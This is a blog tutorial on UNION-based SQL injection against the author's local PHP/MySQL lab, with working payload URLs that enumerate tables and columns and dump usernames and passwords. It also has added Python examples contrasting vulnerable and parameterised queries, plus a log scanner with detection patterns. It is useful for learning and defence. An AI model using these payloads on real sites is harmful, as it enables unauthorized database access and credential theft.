Basics of SQL Injection Attacks


What is SQL Injection?

SQL Injection is a code injection technique used to attack data-driven applications. Despite being around for many years, SQL Injection (SQLi, for short) is still one of the most prevalent security flaws in web applications.


An attacker can send SQL queries as part of a command or input parameter. Through SQL injection an attacker can obtain unauthorized access to a database and may be able to create, read, update, alter, or delete data stored in the back-end database. SQL injection is most commonly used to attack websites.


Key Concepts of SQL Injection

  • SQL injection occurs when an untrusted user sends a SQL query as part of an input parameter, cookie field, or any other header variable whose value is forwarded to the SQL interpreter.
  • Attackers send specially crafted input data to the SQL interpreter and trick the interpreter into executing unintended commands.
  • A SQL injection attack exploits security vulnerabilities at the database layer. An attacker can create, read, modify, or even delete sensitive data.

Note: The authors of this blog strongly discourage you from performing these attacks on real targets. We take no responsibility for any of your actions, good or bad.

Picking up a target

The first and foremost step in performing a SQL injection attack is to look for a vulnerable website. You can use Google Dorks to find such websites. (A Google dork is a specially crafted search query that returns websites matching a particular pattern.) For example:


These dorks return a huge number of websites in the Google search results. But again, injecting a website without the owner's permission could get you into real trouble, so it is wise to practice SQL injection attacks in your own lab. For this purpose, I have built my own SQL injection lab. You can download my PHP-MySQL injection lab from here. Either way, at the end you will have a website with a URL something like

However, I'm using my own lab, so in my case the target URL is


To find out if this website is vulnerable to SQL injection, simply add an apostrophe at the end of the URL like this:

If the website returns a SQL error, or some content on the page goes missing, then the website is vulnerable to SQL injection and we may continue our attack.


Performing the attack

After finding the vulnerability on the website, we have to find the number of columns the website is fetching from the back-end database in its current query, and also which of those columns accept our query and display results on the page. To find this out, append an "order by" clause to the URL.

(Screenshot: MySQL error "Unknown column '6' in 'order clause'")

The "order by" keyword is normally used to sort the result set by a given column. However, we use it here to find the total number of columns by sorting the result set by the last column: we increase the column number until we get an error. In this case we get an error on "order by 6", which means the current query has 5 columns.


At this stage we have the total number of columns and can inject another SELECT statement as part of the input. We do this with the "UNION" keyword, which appends a second SELECT statement to the first. But UNION follows certain rules. For example, if the current query is using something like:

Then we cannot inject another select query like:

It will return an error, because the number of columns in the second SELECT statement differs from the number in the first. That is why we used the "order by" keyword earlier to find the number of columns in the first statement.
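To make the column-count rule concrete, here is an added example (not code from the original post or the author's lab) using Python's built-in sqlite3 as a stand-in for the lab's PHP/MySQL page. It reproduces a five-column query built by string concatenation, shows that a UNION with five literals is accepted while one with two is rejected, and shows the same payload doing nothing against the parameterised form. The table layout and function names are constructed for this example.

```python
import sqlite3

# Constructed stand-in for the lab's products table: five columns, matching the
# "order by 6 fails, so there are 5 columns" finding in the walkthrough above.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products(id INTEGER, name TEXT, descr TEXT, "
                "price TEXT, stock TEXT)")
    con.execute("INSERT INTO products VALUES (1,'Widget','A widget','9.99','10')")
    return con

def vulnerable_lookup(con, id_param):
    # The defect the post relies on: the request parameter is pasted into the SQL text.
    sql = "SELECT id, name, descr, price, stock FROM products WHERE id=" + id_param
    return con.execute(sql).fetchall()

def safe_lookup(con, id_param):
    # Hardened form: a bound parameter is always data, never SQL syntax.
    sql = "SELECT id, name, descr, price, stock FROM products WHERE id=?"
    return con.execute(sql, (id_param,)).fetchall()

def demo():
    con = make_db()
    results = {}
    results["normal"] = vulnerable_lookup(con, "1")
    # Five literals match the five columns, so the UNION is accepted; because
    # id=-1 matches no real row, only the injected row comes back.
    results["union5"] = vulnerable_lookup(con, "-1 UNION SELECT 1,2,3,4,5")
    # Column-count mismatch: the database rejects the UNION, as explained above.
    try:
        vulnerable_lookup(con, "-1 UNION SELECT 1,2")
        results["union2_error"] = None
    except sqlite3.OperationalError as err:
        results["union2_error"] = str(err)
    # Same payload against the parameterised query: it is compared as one
    # literal value, matches nothing, and no second SELECT ever runs.
    results["safe"] = safe_lookup(con, "-1 UNION SELECT 1,2,3,4,5")
    results["safe_normal"] = safe_lookup(con, "1")
    return results

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```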


Coming back to the actual scenario, let's inject this website.

What do we have at this point?

  1. A Vulnerable parameter where we can inject our query.
  2. Total Number of Columns in current Query.

What are our Goals?

  1. Injecting another SELECT statement in the running query.
  2. Finding which column is accepting our Query.
  3. Finding all the table names in the current database.
  4. Finding all the column names of a particular table.
  5. Dumping data from the database.


To find out which column accepts our queries, we use a UNION SELECT statement with the same number of columns as the previous SELECT statement, i.e.

We can perform the above action in our browser with a URL like this:

http://localhost/private/lab/lab-2/view.php?id=-1 UNION SELECT 1,2,3,4,5


Note the "-" (minus sign) in front of the id value in the URL. I used it to isolate the results of the second SELECT query: id=-1 matches no real record, so only the injected rows are displayed.

Now, instead of the normal page, we see some numbers on the page. These numbers are the positions in our second SELECT statement whose values are printed, so they are the columns in which we can place queries and get results back. In the current scenario, columns 2, 3 and 4 are printed on the page. We can use any one of these to continue our injection.


Finding all the table names in the current database.

Fetching the table names of the current database here is slightly different from the usual method. In the MySQL console we would use:

But that would not work here. In this type of SQL injection we have to fetch everything through a SELECT statement, so we are bound to use something like:

In our scenario we will use following URL:

http://localhost/private/lab/lab-2/view.php?id=-1 UNION SELECT 1,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE table_schema=Database()),3,4,5


As you can see in the snapshot, the query returned the list of tables separated by commas. The current database has only 2 tables:

  1. Products
  2. Users

Finding column names

Our ultimate goal is to dump data from the database. Data sits in tables, in their respective fields, so we first need the table names (which we already have from the previous step) and then the field names of the chosen table, i.e. its column names. To do that we use a query something like:

URL:

http://localhost/private/lab/lab-2/view.php?id=-1 UNION SELECT 1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='users' and table_schema=Database()),3,4,5

If that does not work, you may need to write the table name as a hex literal in order to avoid the single quotes.

http://localhost/private/lab/lab-2/view.php?id=-1 UNION SELECT 1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=0x<hex_of_table_name_here_> and table_schema=Database()),3,4,5

For example:

http://localhost/private/lab/lab-2/view.php?id=-1 UNION SELECT 1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=0x7573657273 and table_schema=Database()),3,4,5


We found the following column names in the "users" table:

  1. Id
  2. Username
  3. Password
  4. Email



Dumping Data – Final Step

At this point we have:

  1. A target web site with a parameter vulnerable to SQL Injection
  2. The total number of columns in the query, and which of those columns accept and print results on the screen.
  3. Table Names
  4. Column names of the Table.


Now the only thing left is to use this information to dump the actual data from the database. For instance, let's dump all the records from the "users" table. To do that we can use something like

URL:

http://localhost/private/lab/lab-2/view.php?id=-1 UNION SELECT 1,(SELECT GROUP_CONCAT(username,0x3a,password,0x3c62723e) FROM users),3,4,5



The database returned the following records:

admin:admin123

ahsan:ahsan123
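Every step of this walkthrough leaves a distinctive trace in the web server's access log: a trailing apostrophe, an "order by N" probe, "UNION SELECT", information_schema lookups and hex literals in a query string. The following added example (not part of the original post) scans constructed access-log lines for those patterns and flags sources that trigger more than one rule; the log lines, rule names and function names are all assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines; the paths mirror the probes shown in this post.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /view.php?id=7 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /view.php?id=7' HTTP/1.1" 500 88
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /view.php?id=7%20order%20by%206 HTTP/1.1" 500 88
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /view.php?id=-1%20UNION%20SELECT%201,2,3,4,5 HTTP/1.1" 200 310
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /view.php?id=-1%20UNION%20SELECT%201,(SELECT%20GROUP_CONCAT(TABLE_NAME)%20FROM%20information_schema.tables),3,4,5 HTTP/1.1" 200 330
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /about.php HTTP/1.1" 200 1024
"""

# One rule per step of the walkthrough; applied to the URL-decoded query string.
RULES = [
    ("unbalanced quote probe", re.compile(r"'(?:$|&)")),
    ("column count probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union select", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I)),
    ("schema enumeration", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("hex literal", re.compile(r"\b0x[0-9a-f]{4,}\b", re.I)),
]

# Common Log Format: client, identity, user, timestamp, request line, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def classify_request(path):
    """Return the names of the rules matched by this request path's query string."""
    query = unquote_plus(path.partition("?")[2])
    return [name for name, rx in RULES if rx.search(query)]

def scan_log(text):
    """Yield (client_ip, matched_rules, status) for every request that hits a rule."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, path, status = m.groups()
        hits = classify_request(path)
        if hits:
            findings.append((ip, hits, int(status)))
    return findings

def suspicious_sources(findings, min_rules=2):
    """Clients that triggered at least min_rules distinct rules: one hit can be noise,
    a quote probe followed by UNION SELECT is the enumeration sequence described above."""
    per_ip = {}
    for ip, hits, _status in findings:
        per_ip.setdefault(ip, set()).update(hits)
    return sorted(ip for ip, rules in per_ip.items() if len(rules) >= min_rules)
```

In practice the 500 responses on the probe requests, followed by 200s once the column count is right, are as telling as the patterns themselves.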

This tutorial ends here. If you're not familiar with the SQL commands used here, you can study them here. Thank you for reading.
